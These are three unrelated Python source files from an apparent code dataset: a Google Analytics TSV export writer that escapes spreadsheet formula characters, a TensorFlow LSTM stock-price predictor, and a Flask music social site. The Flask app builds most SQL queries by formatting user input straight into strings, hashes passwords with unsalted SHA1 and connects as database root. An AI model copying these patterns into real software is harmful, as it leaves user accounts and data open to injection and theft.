lib/csv_writer.py | takeratta/ga-dev-tools | 2 | 3438 | # coding=utf-8
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility to convert a Data Export API reponse into TSV.
This provides utitlites to both print TSV files to the standard output
as well as directly to a file. This logic handles all the utf-8 conversion.
GetTsvFilePrinter: Returns an instantiated object to output to files.
GetTsvScreenPrinter: Returns an instantiated object to output to the screen.
UnicodeWriter(): Utf-8 encodes output.
ExportPrinter(): Converts the Data Export API response into tabular data.
"""
__author__ = 'api.nickm@ (<NAME>)'
import codecs
import csv
import StringIO
import sys
import types
# A list of special characters that need to be escaped.
SPECIAL_CHARS = ('+', '-', '/', '*', '=')
# TODO(nm): Test leading numbers.
def GetTsvFilePrinter(file_name):
"""Returns a ExportPrinter object to output to file_name.
Args:
file_name: string The name of the file to output to.
Returns:
The newly created ExportPrinter object.
"""
my_handle = open(file_name)
writer = UnicodeWriter(my_handle, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvScreenPrinter():
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(sys.stdout, dialect='excel-tab')
return ExportPrinter(writer)
def GetTsvStringPrinter(f):
"""Returns a ExportPrinter object to output to std.stdout."""
writer = UnicodeWriter(f, dialect='excel-tab')
return ExportPrinter(writer)
# Wrapper to output to utf-8. Taken mostly / directly from Python docs:
# http://docs.python.org/library/csv.html
class UnicodeWriter(object):
"""A CSV writer which uses the csv module to output csv compatible formats.
Will write rows to CSV file "f", which is encoded in the given encoding.
"""
def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds):
# Redirect output to a queue
self.queue = StringIO.StringIO()
self.writer = csv.writer(self.queue, dialect=dialect, **kwds)
self.stream = f
self.encoder = codecs.getincrementalencoder(encoding)()
# pylint: disable=g-bad-name
def writerow(self, row):
"""Writes a CSV row.
Args:
row: list The row to write to the CSV output.
"""
self.writer.writerow([s.encode('utf-8') for s in row])
# Fetch UTF-8 output from the queue ...
data = self.queue.getvalue()
data = data.decode('utf-8')
# ... and reencode it into the target encoding
data = self.encoder.encode(data)
# write to the target stream
self.stream.write(data)
# empty queue
self.queue.truncate(0)
# pylint: disable=g-bad-name
def writerows(self, rows):
"""Writes rows for CSV output.
Args:
rows: list of rows to write.
"""
for row in rows:
self.writerow(row)
class ExportPrinter(object):
"""Utility class to output a the data feed as tabular data."""
def __init__(self, writer):
"""Initializes the class.
Args:
writer: Typically an instance of UnicodeWriter. The interface for this
object provides two methods, writerow and writerow, which
accepts a list or a list of lists respectively and process them as
needed.
"""
self.writer = writer
def Output(self, results):
"""Outputs formatted rows of data retrieved from the Data Export API.
This uses the writer object to output the data in the Data Export API.
Args:
results: The response from the data export API.
"""
if not results.get('rows'):
self.writer.writerow('No Results found')
else:
self.OutputProfileName(results)
self.writer.writerow([])
self.OutputContainsSampledData(results)
self.writer.writerow([])
self.OutputQueryInfo(results)
self.writer.writerow([])
self.OutputHeaders(results)
self.OutputRows(results)
self.writer.writerow([])
self.OutputRowCounts(results)
self.OutputTotalsForAllResults(results)
def OutputProfileName(self, results):
"""Outputs the profile name along with the qurey."""
profile_name = ''
info = results.get('profileInfo')
if info:
profile_name = info.get('profileName')
self.writer.writerow(['Report For View (Profile): ', profile_name])
def OutputQueryInfo(self, results):
"""Outputs the query used."""
self.writer.writerow(['These query parameters were used:'])
query = results.get('query')
for key, value in query.iteritems():
if type(value) == types.ListType:
value = ','.join(value)
else:
value = str(value)
value = ExcelEscape(value)
self.writer.writerow([key, value])
def OutputContainsSampledData(self, results):
"""Outputs whether the resuls have been sampled."""
sampled_text = 'do not'
if results.get('containsSampledData'):
sampled_text = 'do'
row_text = 'These results %s contain sampled data.' % sampled_text
self.writer.writerow([row_text])
def OutputHeaders(self, results):
"""Outputs all the dimension and metric names in order."""
row = []
for header in results.get('columnHeaders'):
row.append(header.get('name'))
self.writer.writerow(row)
def OutputRows(self, results):
"""Outputs all the rows in the table."""
# Replace any first characters that have an = with '=
for row in results.get('rows'):
out_row = []
for cell in row:
cell = ExcelEscape(cell)
out_row.append(cell)
self.writer.writerow(out_row)
def OutputRowCounts(self, results):
"""Outputs how many rows were returned vs rows that were matched."""
items = str(results.get('itemsPerPage'))
matched = str(results.get('totalResults'))
output = [
['Rows Returned', items],
['Rows Matched', matched]
]
self.writer.writerows(output)
def OutputTotalsForAllResults(self, results):
"""Outputs the totals for all results matched by the query.
This is not the sum of the values returned in the response.
This will align the metric totals in the same columns as
the headers are printed. The totals are stored as a dict, where the
key is the metric name and the value is the total. To align these
totals in the proper columns, a position index of the metric name
and it's position in the table is first created. Then the totals
are added by position to a row of empty strings.
Args:
results: API Response from Core Reporting API.
"""
# Create the metric position index.
metric_index = {}
headers = results.get('columnHeaders')
for index in range(0, len(headers)):
header = headers[index]
if header.get('columnType') == 'METRIC':
metric_index[header.get('name')] = index
# Create a row of empty strings the same length as the header.
row = [''] * len(headers)
# Use the position index to output the totals in the right columns.
totals = results.get('totalsForAllResults')
for metric_name, metric_total in totals.iteritems():
index = metric_index[metric_name]
row[index] = metric_total
self.writer.writerows([['Totals For All Rows Matched'], row])
def ExcelEscape(input_value):
"""Escapes the first character of a string if it is special in Excel.
Args:
input_value: string The value to escape.
Returns:
A string that has the first character escaped if it is special.
"""
if input_value and input_value[0] in SPECIAL_CHARS:
return "'" + input_value
return input_value
| 2.921875 | 3 |
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py | yuwenxianglong/zhxsh.github.io | 0 | 3439 | <gh_stars>0
# -*- coding: utf-8 -*-
"""
@Project : RNN_Prediction
@Author : <NAME>
@Filename: stockPrediction202005201318.py
@IDE : PyCharm
@Time1 : 2020-05-20 13:18:46
@Time2 : 2020/5/20 13:18
@Month1 : 5月
@Month2 : 五月
"""
import tushare as ts
import tensorflow as tf
import pandas as pd
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
stock_catl = ts.get_hist_data('300750')
stock_catl = stock_catl.sort_index(ascending=True)
stock_catl = (stock_catl - stock_catl.mean()) / \
(stock_catl.max() - stock_catl.min())
# train, val = train_test_split(stock_catl, test_size=0.5)
# train = train.sort_index(ascending=True)
# val = val.sort_index(ascending=True)
train = stock_catl.iloc[:-60, :]
val = stock_catl.iloc[-60:, :]
window_size = 30
column = 'high'
epoches = 300
def batch_dataset(dataset):
dataset_batched = dataset.batch(window_size, drop_remainder=True)
return dataset_batched
def zip_ds(dataset):
ds_data = tf.constant(dataset.values, dtype=tf.float32)
ds_data = tf.data.Dataset.from_tensor_slices(ds_data). \
window(window_size, shift=1).flat_map(batch_dataset)
ds_label = tf.constant(dataset.values[window_size:], dtype=tf.float32)
ds_label = tf.data.Dataset.from_tensor_slices(ds_label)
ds_train = tf.data.Dataset.zip((ds_data, ds_label)).batch(128).repeat()
return ds_train
ds_train = zip_ds(train)
ds_val = zip_ds(val)
model = tf.keras.Sequential(
[
tf.keras.layers.LSTM(128, return_sequences=True, activation='relu'),
tf.keras.layers.LSTM(128, activation='relu'),
tf.keras.layers.Dense(13)
]
)
optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)
model.compile(optimizer=optimizer, loss='mse')
history = model.fit(
ds_train, epochs=epoches,
steps_per_epoch=5,
validation_data=ds_val,
validation_steps=1
)
model.save('stockLSTM')
# Plot loss function
plt.figure(figsize=(19, 9))
ax = plt.gca()
plt.plot(range(len(history.history['loss'])), history.history['loss'])
plt.plot(range(len(history.history['val_loss'])), history.history['val_loss'])
ax.set_yscale('log')
plt.show()
# Compare fitting and real values.
dff = pd.DataFrame()
for i in range(len(stock_catl) - window_size):
fits = model.predict(tf.constant(tf.expand_dims(stock_catl.values[i:i + window_size, :], axis=0)))
dffits = pd.DataFrame(fits, columns=stock_catl.columns)
dff = dff.append(dffits)
dff.index = stock_catl.index[window_size:]
plt.figure(figsize=(19, 9))
dff[column].plot()
stock_catl.iloc[window_size:, :][column].plot(style='-o')
plt.show()
# To predict future 100 business days.
dfp = stock_catl.copy()
for i in range(100):
pres = model.predict(tf.constant(tf.expand_dims(dfp.values[-1 * window_size:], axis=0)))
dfpres = pd.DataFrame(pres, columns=stock_catl.columns)
dfp = dfp.append(dfpres, ignore_index=True)
dfp[column].plot()
plt.show()
| 2.703125 | 3 |
src/mushme.py | MuShMe/MuShMe | 1 | 3440 | <filename>src/mushme.py<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from src import app
import os
import shutil
from flask import Flask, render_template, session, request, flash, url_for, redirect
from Forms import ContactForm, LoginForm, editForm, ReportForm, CommentForm, searchForm, AddPlaylist
from flask.ext.mail import Message, Mail
from werkzeug import secure_filename
from werkzeug import SharedDataMiddleware
from api import API
from songs import SONG
from playlist import playlist
from admin import admin
from artist import artist
import pymysql
import hashlib
from flask import g
mail = Mail()
mail.init_app(app)
#For the collector script.
app.register_blueprint(API);
#For the songs
app.register_blueprint(SONG);
#For the playlist
app.register_blueprint(playlist);
#for the admin pages
app.register_blueprint(admin);
#for the artist pages
app.register_blueprint(artist);
UPLOAD_FOLDER = "img/ProfilePic/"
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
app.config['UPLOAD_FOLDER'] = 'src/static/' + UPLOAD_FOLDER
@app.route('/')
def index():
session["login"] = False
session["signup"] = False
session["logged_in"] = False
return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=ContactForm(prefix='form2'))
#For database connections.
@app.before_request
def before_request():
g.conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='<PASSWORD>', db='MuShMe', charset='utf8')
g.database = g.conn.cursor()
@app.teardown_request
def teardown_request(exception):
g.conn.close()
@app.route('/login', methods=['POST'])
def login():
session["login"] = True
session["signup"] = False
if request.method == 'POST':
loginform = LoginForm(request.form, prefix='form1')
if loginform.validate_on_submit():
check_login = g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ %
(loginform.email.data, hashlib.sha1(loginform.password.data).hexdigest()))
if check_login:
userid= g.database.fetchone()
g.database.execute("""UPDATE MuShMe.entries SET Last_Login=CURRENT_TIMESTAMP() WHERE User_id="%s" """ % (userid))
g.conn.commit()
for uid in userid:
session['userid'] = uid
g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid )
session['UserName']=g.database.fetchone()[0]
g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['privilege'] = g.database.fetchone()[0]
g.database.execute("""SELECT Profile_pic FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['profilepic'] = g.database.fetchone()[0]
g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid )
session["Name"]=g.database.fetchone()
g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid )
session["dob"]=str(g.database.fetchone())
session['logged_in'] = True
session['logged_in']=True
#print uid
#print userid
return redirect(url_for('userProfile', userid=uid))
else:
flash("Incorrect Email-Id or Password")
else:
flash("Incorrect Email-Id or Password")
return render_template('homepage/index.html', form1=loginform, form2=ContactForm(prefix='form2'))
else:
return redirect(url_for(('index')))
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
))
@app.route('/signup', methods=['POST'])
def signup():
session["signup"] = True
session["login"] = False
contactform = ContactForm(request.form, prefix='form2')
if contactform.validate_on_submit():
if validate(contactform.email.data,contactform.username.data):
check_signup = g.database.execute("""INSERT into MuShMe.entries (Username,Email_id,Pwdhash,Name) VALUES ("%s","%s","%s","%s")""" %
(contactform.username.data,
contactform.email.data,
hashlib.sha1(contactform.password.data).hexdigest(),contactform.name.data,
))
if check_signup:
g.conn.commit()
g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ %
(contactform.email.data, hashlib.sha1(contactform.password.data).hexdigest()))
user_id = g.database.fetchone()
for uid in user_id:
session['userid'] = uid
g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid )
session['UserName']=g.database.fetchone()[0]
g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['privilege'] = g.database.fetchone()[0]
g.database.execute("""SELECT Profile_Pic FROM MuShMe.entries WHERE User_id="%s" """ % uid)
session['profilepic'] = g.database.fetchone()[0]
session['logged_in'] = True
g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid )
session["Name"]=g.database.fetchone()
g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid )
session["dob"]=str(g.database.fetchone())
newPlaylist = session['UserName'] + ' default collection'
g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (newPlaylist,uid))
g.conn.commit()
return redirect(url_for('userProfile',userid=uid))
else:
flash("Please enter valid data !")
else:
flash("Username or Email has been taken")
else:
flash_errors(contactform)
return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=contactform)
def validate(email,username):
email = g.database.execute(""" SELECT * from MuShMe.entries where Email_id="%s" """ % email)
name = g.database.execute(""" SELECT * from MuShMe.entries where Username="%s" """ % username)
if email or name:
return False
else:
return True
@app.route('/user/<userid>',methods=['GET'])
def userProfile(userid):
if session['logged_in'] == False:
return render_template('error.html'), 404
else:
if request.method == 'GET':
User=getUserData(userid)
return render_template('userprofile/index.html', userid=userid,
form4=CommentForm(prefix='form4'), form3=editForm(prefix='form3'),
form6=searchForm(prefix='form6'), form5=ReportForm(prefix='form5'),form7=AddPlaylist(prefix='form7'),
friend=getFriend(userid), playlist=getPlaylist(userid), User=getUserData(userid), Comments=getComments(userid),
songs=getSong(userid), Recommends=getRecommend(userid), Requests=getRequest(userid),frnd=checkFriend(userid,User),
AllComments=getAllComments(userid), AllRecommends=getAllRecommend(userid))
def checkFriend(userid,User):
friendName =[]
g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % (userid))
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
friendName.append(data)
for f in friendName:
a=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid']))
b=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid']))
if a or b:
return True
elif userid == f['friendid']:
return True
else:
return False
g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid)
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
friendName.append(data)
for f in friendName:
a=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid']))
b=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid']))
if a or b:
return True
elif userid == f['friendid']:
return True
else:
return False
def getAllComments(userid):
g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC" % (userid))
commentids = g.database.fetchall()
retval = []
for commentid in commentids:
g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0]))
commentdata = g.database.fetchone()
data = {}
data['comment'] = commentdata[0]
data['userid'] = commentdata[1]
data['commentid'] = commentid[0]
g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid']))
data['username'] = g.database.fetchone()[0]
retval.append(data)
return retval
def getComments(userid):
g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC LIMIT 5" % (userid))
commentids = g.database.fetchall()
retval = []
for commentid in commentids:
g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0]))
commentdata = g.database.fetchone()
data = {}
data['comment'] = commentdata[0]
data['userid'] = commentdata[1]
data['commentid'] = commentid[0]
g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid']))
data['username'] = g.database.fetchone()[0]
retval.append(data)
return retval
def getFriend(userid):
friendName =[]
g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % userid)
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
data['friendpic']=a[2]
friendName.append(data)
g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid)
for user in g.database.fetchall():
data = {}
g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0])
for a in g.database.fetchall():
data['friendname']=a[0]
data['friendid']=a[1]
data['friendpic']=a[2]
friendName.append(data)
print friendName
return friendName
def getPlaylist(userid):
playlist = []
g.database.execute("""SELECT Playlist_name,Playlist_id from MuShMe.playlists WHERE User_id="%s" """ % userid)
for p in g.database.fetchall():
data = {}
data['pname']=p[0]
data['pid']=p[1]
playlist.append(data)
return playlist
def getSong(userid):
songName = []
g.database.execute("""SELECT Song_id from MuShMe.user_song WHERE User_id=%s LIMIT 5""" % userid)
for song in g.database.fetchall():
data = {}
g.database.execute("""SELECT Song_title,Song_id,Song_Album from MuShMe.songs WHERE Song_id="%s" """ % song)
for a in g.database.fetchall():
data['songname']=a[0]
data['songid']=a[1]
g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s " % (a[2]))
g.conn.commit()
data['art'] = g.database.fetchone()[0]
songName.append(data)
return songName
def getUserData(userid):
User = []
g.database.execute(""" SELECT Username,User_id,Profile_pic,Privilege,Email_id,Name,DOB from entries where User_id="%s" """ % userid)
for a in g.database.fetchall():
data={}
data['username']=a[0]
data['userid']=a[1]
data['profilepic'] = a[2]
data['privilege']=a[3]
data['email']=a[4]
data['name']=a[5]
data['dob']=str(a[6])
User.append(data)
return User
def getAllRecommend(userid):
recommend =[]
g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" """ % userid)
for a in g.database.fetchall():
data={}
data['rid']=a[0]
data['userfrom'] = a[1]
data['userto']=a[2]
g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1])
data['userfromname'] = g.database.fetchone()[0]
check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0])
if check_song:
songid = g.database.fetchone()[0]
data['song'] = []
g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid)
for song in g.database.fetchall():
d = {}
d['title']=song[0]
d['album'] = song[1]
d['genre'] = song[2]
d['publisher'] = song[3]
d['songid'] = songid
data['song'].append(d)
check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0])
if check_playlist:
playlistid = g.database.fetchone()[0]
data['playlist'] = []
g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid)
for p in g.database.fetchall():
d= {}
d['pname']=p[0]
d['pid']=p[1]
g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2])
for k in g.database.fetchall():
d['username']=k[0]
d['uname']=k[1]
d['userid']=k[2]
data['playlist'].append(d)
recommend.append(data)
return recommend
def getRecommend(userid):
recommend =[]
g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" LIMIT 5 """ % userid)
for a in g.database.fetchall():
data={}
data['rid']=a[0]
data['userfrom'] = a[1]
data['userto']=a[2]
g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1])
data['userfromname'] = g.database.fetchone()[0]
print data['userfromname']
check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0])
if check_song:
songid = g.database.fetchone()[0]
data['song'] = []
g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid)
for song in g.database.fetchall():
d = {}
d['title']=song[0]
d['album'] = song[1]
d['genre'] = song[2]
d['publisher'] = song[3]
d['songid'] = songid
d['songart'] = getSongArt(songid)
data['song'].append(d)
check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0])
if check_playlist:
playlistid = g.database.fetchone()[0]
data['playlist'] = []
g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid)
for p in g.database.fetchall():
d= {}
d['pname']=p[0]
d['pid']=p[1]
g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2])
for k in g.database.fetchall():
d['username']=k[0]
d['uname']=k[1]
d['userid']=k[2]
data['playlist'].append(d)
recommend.append(data)
return recommend
def getRequest(userid):
request =[]
g.database.execute(""" SELECT Request_id,Request_from,Request_to,Status from requests where Request_to="%s" """ % userid)
for a in g.database.fetchall():
data={}
data['reqid']=a[0]
data['reqfrom'] = a[1]
data['reqto']=a[2]
data['status']=a[3]
data['reqfromuser'] = []
g.database.execute(""" SELECT User_id,Username,Name from entries where User_id='%s' """ % a[1])
for i in g.database.fetchall():
d={}
d['userid'] = i[0]
d['username'] = i[1]
d['name'] = i[2]
data['reqfromuser'].append(d)
print data
request.append(data)
return request
def getSongArt(songid):
g.database.execute("SELECT Song_Album FROM songs WHERE song_id=%s", (songid))
albumname = g.database.fetchone()[0]
g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s", (albumname))
return g.database.fetchone()[0]
@app.route('/user/<userid>/edit',methods=['POST','GET'])
def editName(userid):
if request.method == 'POST':
uid = userid
print request.form
if request.form['editname'] != '':
g.database.execute("""UPDATE MuShMe.entries SET Name=%s WHERE User_id=%s """, ([request.form['editname']], userid))
g.conn.commit()
if request.form['birthday_year'] != '0' and request.form['birthday_month'] != '0' and request.form['birthday_day'] != '0':
g.database.execute("""UPDATE MuShMe.entries SET DOB="%s-%s-%s" WHERE User_id="%s" """ % (request.form['birthday_year'],request.form['birthday_month'],request.form['birthday_day'], userid))
g.conn.commit()
return redirect(url_for('userProfile',userid=userid))
else:
return redirect(url_for('userProfile', userid=userid))
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/user/<userid>/file', methods=['GET', 'POST'])
def upload_file(userid):
if request.method == 'POST':
file = request.files['file']
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
filepath = UPLOAD_FOLDER + filename
session['profilepic'] = filepath
g.database.execute("""UPDATE MuShMe.entries SET Profile_pic="%s" WHERE User_id="%s" """ % (filepath, userid))
g.conn.commit()
return redirect(url_for('userProfile', userid=userid))
app.add_url_rule('/user/uploads/<filename>', 'uploaded_file',build_only=True)
app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {'/user/uploads': 'src/static' + app.config['UPLOAD_FOLDER'] })
@app.route('/user/<rcvrid>.<senderid>/comment',methods=['POST','GET'])
def comment(rcvrid, senderid):
if request.method == 'POST':
commentform = CommentForm(request.form, prefix='form4')
#print senderid
#print rcvrid
if commentform.comment.data:
query = ("""INSERT INTO MuShMe.comments (comment_type, Comment, User_id) VALUES ("%s","%s","%s") """ % ('U',commentform.comment.data, senderid))
print query
g.database.execute(query)
g.conn.commit()
g.database.execute("""SELECT Comment_id from MuShMe.comments WHERE Comment="%s" """ % (commentform.comment.data))
data = g.database.fetchone()[0]
#print data
enter_comment = g.database.execute("""INSERT INTO MuShMe.user_comments (Comment_id, User_id) VALUES ("%s","%s")""" % (data,rcvrid))
if enter_comment:
g.conn.commit()
g.database.execute("""SELECT User_id FROM MuShMe.user_comments WHERE Comment_id="%s" """ % data)
#print g.database.fetchone()[0]
return redirect(url_for('userProfile', userid=rcvrid))
@app.route('/user/<userid>/<commentid>/report',methods=['POST','GET'])
def report(userid,commentid):
if request.method == 'POST':
reportform = ReportForm(request.form, prefix='form5')
print reportform.report.data
check_report = g.database.execute("""INSERT INTO MuShMe.complaints (Complain_type, Complain_description, Comment_id,reported_by) VALUES ("%s","%s","%s","%s") """ % (reportform.report.data, reportform.other.data, commentid, session['userid'] ))
if check_report == True:
g.conn.commit()
return redirect(url_for('userProfile', userid=userid))
else:
return redirect(url_for('userProfile', userid=userid))
@app.route('/user/<uidto>.<uidfrom>/request',methods=['POST'])
def sendrequest(uidto,uidfrom):
if request.method == 'POST':
if requestvalidate(uidfrom,uidto):
query=(""" INSERT INTO requests (Request_from,Request_to,Status) VALUES ("%s","%s","%s") """ % (uidfrom,uidto,1))
g.database.execute(query)
g.conn.commit()
return redirect(url_for('userProfile', userid=uidto))
@app.route('/user/<userto>.<userfrom>/accept',methods=['POST'])
def acceptrequest(userto,userfrom):
if request.method == 'POST':
query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (0,userfrom,userto))
g.database.execute(query)
g.conn.commit()
query = (""" INSERT INTO friends Values ("%s","%s") """ % (userfrom,userto))
g.database.execute(query)
g.conn.commit()
return redirect(url_for('userProfile', userid=userto))
@app.route('/user/<userto>.<userfrom>/reject',methods=['POST'])
def rejectrequest(userto,userfrom):
if request.method == 'POST':
query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (-1,userfrom,userto))
g.database.execute(query)
g.conn.commit()
return redirect(url_for('userProfile', userid=userto))
def requestvalidate(userfrom,userto):
check = g.database.execute(""" SELECT Status from requests where Request_to="%s" and Request_from="%s" """ % (userfrom,userto))
if check and g.database.fetchone()[0]=='-1' and userfrom!=userto:
return False
else:
return True
@app.route('/search',methods=['POST','GET'])
def search():
if request.method == 'POST':
searchform = searchForm(prefix='form6')
#print 'f'
value = searchform.entry.data + '%'
search_fname = []
search_song= []
search_friend = []
search_playlist =[]
search_artist = []
check_song = g.database.execute("""SELECT Song_title,Song_Album,Genre,Publisher,Song_id from MuShMe.songs WHERE Song_title LIKE "%s" """ % ( value ))
for a in g.database.fetchall():
data={}
data['title']=a[0]
data['album']=a[1]
data['genre']=a[2]
data['publisher']=a[3]
data['songid']=a[4]
data['art']=getSongArt(a[4])
search_song.append(data)
check_artist = g.database.execute("""SELECT Artist_name, Artist_id from MuShMe.artists WHERE Artist_name LIKE "%s" """ % ( value ))
for a in g.database.fetchall():
data = {}
data['artistname']=a[0]
data['artistid']=a[1]
search_artist.append(data)
check_friend = g.database.execute("""SELECT Username, Name, Profile_pic, User_id from MuShMe.entries WHERE Username LIKE "%s" or Name LIKE "%s" """ % ( value, value ))
for a in g.database.fetchall():
data = {}
data['username']=a[0]
data['name']=a[1]
data['profilepic']=a[2]
data['userid']=a[3]
search_friend.append(data)
check_playlist = g.database.execute("""SELECT Playlist_name,User_id, Playlist_id from MuShMe.playlists WHERE Playlist_name LIKE "%s" """ % ( value ))
for a in g.database.fetchall():
data = {}
data['pname']=a[0]
data['pid']=a[2]
g.database.execute(""" SELECT Username, Name from MuShMe.entries WHERE User_id="%s" """ % a[1])
for k in g.database.fetchall():
data['username']=k[0]
data['uname']=k[1]
search_playlist.append(data)
length = len(search_playlist) + len(search_song) + len(search_friend) + len(search_artist) + len(search_fname)
return render_template('searchpage/search.html', entry=searchform.entry.data,form6=searchForm(prefix='form6'),
search_song=search_song, search_artist=search_artist,friends=search_friend,
search_playlist=search_playlist,length = length)
else:
return render_template('searchpage/search.html',form6=searchForm(prefix='form6'))
@app.route('/user/<userid>/addplaylist',methods=['POST'])
def addplaylist(userid):
if request.method=='POST':
addplaylistform = AddPlaylist(prefix='form7')
g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (addplaylistform.add.data,userid))
g.conn.commit()
return redirect(url_for('userProfile',userid=userid))
@app.route("/playlist/<userid>/deleteplaylist", methods=["POST"])
def deleteplaylist(userid):
playlist = request.form.getlist('playlistselect')
for playlistid in playlist:
g.database.execute("""DELETE FROM playlists WHERE Playlist_id=%s and User_id=%s """ %
(playlistid, userid))
g.conn.commit()
return redirect(url_for('userProfile',userid=userid))
#All your profile are belong to us.
@app.route('/artist/<artistid>')
def artistProfile(artistid):
return render_template('artistpage/index.html',form6=searchForm(prefix='form6'))
#To handle 404 not found errors
@app.errorhandler(404)
def page_not_found_error(error):
return render_template('error.html'), 404
@app.route('/termsofservices')
def tos():
return render_template('tos.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/changepwd')
def changepwd():
return render_template('changepwd.html')
@app.route('/logout')
def logout():
if 'email' not in session:
return render_template('error.html')
session['logged_in']=False
return render_template('login.html')
if not app.debug:
import logging
from logging.handlers import SMTPHandler
mail_handler = SMTPHandler('127.0.0.1', '<EMAIL>', app.config['DEFAULT_MAIL_SENDER'], 'YourApplication Failed')
mail_handler.setLevel(logging.ERROR)
app.logger.addHandler(mail_handler)
from logging import FileHandler
file_handler = FileHandler('log.txt')
file_handler.setLevel(logging.WARNING)
app.logger.addHandler(file_handler)
from logging import Formatter
mail_handler.setFormatter(Formatter('''
Message type: %(levelname)s
Location: %(pathname)s:%(lineno)d
Module: %(module)s
Function: %(funcName)s
Time: %(asctime)s
Message:
%(message)s
'''))
if __name__ == """__main__""":
# To allow aptana to receive errors, set use_debugger=False
app = create_app(config="""config.yaml""")
